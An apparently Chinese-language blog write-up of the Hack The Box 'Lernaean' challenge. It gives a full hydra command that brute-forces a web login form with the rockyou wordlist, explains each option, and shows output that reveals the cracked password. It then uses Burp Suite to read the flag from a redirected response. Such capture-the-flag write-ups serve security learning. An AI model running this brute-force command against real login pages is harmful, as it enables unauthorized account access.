HTB(hack the box) Lernaean

HTB(hack the box) Lernaean

接着上一次的。
题目:
在这里插入图片描述
提示:
你的目标不是很擅长电脑。试着猜猜他们的密码,看看他们是否隐藏了什么!

打开网页:
在这里插入图片描述
不就是暴力破解密码么。使用hydra来破解。

hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 64  docker.hackthebox.eu http-post-form "/:password=^PASS^:Invalid password!" -s 30206

-l:指定用户名
-P:指定密码字典文件
-t:线程数
http-post-form:表明是post请求
“/:password=^PASS^:Invalid password!” 分别是目标网页位置:需要破解的字段:猜测错误的出现的字段(可以自定义)
-s:端口号

结果:

root@kali:~# hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 64  docker.hackthebox.eu http-post-form "/:password=^PASS^:Invalid password!" -s 30206
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-11-12 20:35:57
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-post-form://docker.hackthebox.eu:30206/:password=^PASS^:Invalid password!
[STATUS] 308.00 tries/min, 308 tries in 00:01h, 14344091 to do in 776:12h, 64 active
[30206][http-post-form] host: docker.hackthebox.eu   login: admin   password: leonardo

就得到了密码。登录:
在这里插入图片描述
它告诉你,太慢。。。。。
观察url,被重定向了。使用burpsuite来抓包。观察response。
在这里插入图片描述
红色遮挡的就是flag。

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值